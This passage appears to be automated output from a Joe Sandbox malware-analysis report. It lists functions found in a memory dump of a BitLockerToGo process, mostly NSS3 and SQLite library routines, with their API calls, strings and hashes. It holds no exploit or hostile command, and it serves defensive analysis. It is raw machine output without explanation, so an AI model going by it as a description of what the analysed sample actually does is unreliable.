                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a01fdeecdc9345af2e47ec5c157ae990df4dace2c84bfcc9b40d66d093dc2f65
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3413DB4A04605DFCB00DF79C1848AABBF0FF89354B118569EC599B710EB30E855CBD5
                                                                                                                                                                                                                                                                                                                                                          Function 6C68ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C68DE64), ref: 6C68ED0C
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C68ED22
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7718D0,?), ref: 6C69B095
                                                                                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C68ED4A
                                                                                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C68ED6B
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C68ED38
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: TlsGetValue.KERNEL32(?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4C97
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CB0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: PR_Unlock.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CC9
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C68ED52
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C68ED83
                                                                                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C68ED95
                                                                                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C68ED9D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C6A127C,00000000,00000000,00000000), ref: 6C6A650E
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3323615905-3315324353
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 61f58c0e67d1202e8ad4af2ba8652d040477e4c3202a2eae99b2d1e777266e55
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d3532c6d7b8132fdf7b85404953b3bc06b16ff7b344697efb1476b53b378fd84
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61f58c0e67d1202e8ad4af2ba8652d040477e4c3202a2eae99b2d1e777266e55
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC110579A01204ABEB1056A9AC44FBF72B8AF4270CF014524EC1562E41F724EA0E86FE
                                                                                                                                                                                                                                                                                                                                                          Function 6C750EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Aborting,?,6C632357), ref: 6C750EB8
                                                                                                                                                                                                                                                                                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C632357), ref: 6C750EC0
                                                                                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C750EE6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: PR_Now.NSS3 ref: 6C750A22
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C750A35
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C750A66
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: PR_GetCurrentThread.NSS3 ref: 6C750A70
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C750A9D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C750AC8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: PR_vsmprintf.NSS3(?,?), ref: 6C750AE8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: EnterCriticalSection.KERNEL32(?), ref: 6C750B19
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C750B48
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C750C76
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7509D0: PR_LogFlush.NSS3 ref: 6C750C7E
                                                                                                                                                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C750EFA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C63AF0E
                                                                                                                                                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C750F16
                                                                                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C750F1C
                                                                                                                                                                                                                                                                                                                                                          • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C750F25
                                                                                                                                                                                                                                                                                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C750F2B
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                                                                                                                                                                                                                                                          • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3905088656-1374795319
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4182cb20f92afe347bb9bd20a66ccef9a677d657138a7e2c3bfbe4e16214ea70
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 77f8697e6a15235020f1f2f18321d41881a9f3fc97aa4fd0506578252a2d3a34
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4182cb20f92afe347bb9bd20a66ccef9a677d657138a7e2c3bfbe4e16214ea70
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1F0AFF69001187BDE003FA09D4EC9B3E2DDF86269F444434FE0956612DA36EA2596B2
                                                                                                                                                                                                                                                                                                                                                          Function 6C6B4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000400), ref: 6C6B4DCB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6487ED,00000800,6C63EF74,00000000), ref: 6C6A1000
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PR_NewLock.NSS3(?,00000800,6C63EF74,00000000), ref: 6C6A1016
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6487ED,00000008,?,00000800,6C63EF74,00000000), ref: 6C6A102B
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C6B4DE1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C6B4DFF
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6B4E59
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FAB0: free.MOZGLUE(?,-00000001,?,?,6C63F673,00000000,00000000), ref: 6C69FAC7
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C77300C,00000000), ref: 6C6B4EB8
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C6B4EFF
                                                                                                                                                                                                                                                                                                                                                          • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C6B4F56
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6B521A
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1025791883-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 38dd3c6f749b551242fcad5c14a69239ef5aff925577fbf4c687fbbd5829ae8a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 021b4e88e6e980d8950850577f8965bfcba4509b8a6d2d035e0ea000cdb998c3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38dd3c6f749b551242fcad5c14a69239ef5aff925577fbf4c687fbbd5829ae8a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F18B71E00209CBDB04CF54D8407AEB7B2FF89358F254129E915BB781EB75E992CB98
                                                                                                                                                                                                                                                                                                                                                          Function 6C644FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(00000001,00000000,6C790148,?,6C656FEC), ref: 6C64502A
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(00000001,00000000,6C790148,?,6C656FEC), ref: 6C645034
                                                                                                                                                                                                                                                                                                                                                          • PL_NewHashTable.NSS3(00000000,6C69FE80,6C69FD30,6C6EC350,00000000,00000000,00000001,00000000,6C790148,?,6C656FEC), ref: 6C645055
                                                                                                                                                                                                                                                                                                                                                          • PL_NewHashTable.NSS3(00000000,6C69FE80,6C69FD30,6C6EC350,00000000,00000000,?,00000001,00000000,6C790148,?,6C656FEC), ref: 6C64506D
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: HashLockTable
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3862423791-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 198e17858db5a8df630c1a38eaad225546cbac4cd4032a9b1f01e41b6db34191
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 055ad848523c31666c639629a66e0a5ec07d4baf142ad564e2df432ced3d3cc3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 198e17858db5a8df630c1a38eaad225546cbac4cd4032a9b1f01e41b6db34191
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2331B5B5B092109BDB109EA6E84CB4F37B8EB1379DF21C135E90987A40D3748805CBE9
                                                                                                                                                                                                                                                                                                                                                          Function 6C5E2E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5E2F3D
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?), ref: 6C5E2FB9
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C5E3005
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C5E30EE
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5E3131
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5E3178
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memcpy$memsetsqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 984749767-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1e9971498fbf96370200ea63e12492005225e9127e708e68d554edae0991006e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c7c13eccb3ab8581d81ebc04648c4a68bce3e6c166a9990682680c4106950fe2
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e9971498fbf96370200ea63e12492005225e9127e708e68d554edae0991006e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DB19BB0E052199BCB08CF9DCC85AAEB7B1BB4C304F14846DE859A7B55D774A941CBA0
                                                                                                                                                                                                                                                                                                                                                          Function 6C632D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: __allrem
                                                                                                                                                                                                                                                                                                                                                          • String ID: @ul$Pul$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$ul
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2933888876-1957657009
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c500cf17fcbf400f4e04ae17b612297889e1b6960736512bdfbb7937ab203405
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 426309dc49dc5095736200b29e137a615615f9c7d22405a920db32f25b7ec439
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c500cf17fcbf400f4e04ae17b612297889e1b6960736512bdfbb7937ab203405
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3618D71A002159FDB04CF68DC98AAA77F1FF89314F10923CE91A9B791DB31A906CB95
                                                                                                                                                                                                                                                                                                                                                          Function 6C6369A0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C62F9C9,?,6C62F4DA,6C62F9C9,?,?,6C5F369A), ref: 6C5CCA7A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C5CCB26
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C636A02
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C636AA6
                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C636AF9
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C636B15
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000BCCC), ref: 6C636BA6
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$memsetsqlite3_freesqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: Pul$`ul$delayed %dms for lock/sharing conflict at line %d$winDelete
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1816828315-2236588079
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cff12ddf9d16c4ab5e2edddde5bbef74ec966e8c2b4827e1776a73b4234c411d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 83104b6f2da853057cb39db06022e96b2522c86397704d13a2492904d9f247d9
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cff12ddf9d16c4ab5e2edddde5bbef74ec966e8c2b4827e1776a73b4234c411d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F751E031B001199BEB08AFA9EC58ABF3775FB87314B146138E51AD6680DB319902CB96
                                                                                                                                                                                                                                                                                                                                                          Function 6C65FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C65FCBD
                                                                                                                                                                                                                                                                                                                                                          • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C65FCCC
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C65FCEF
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C65FD32
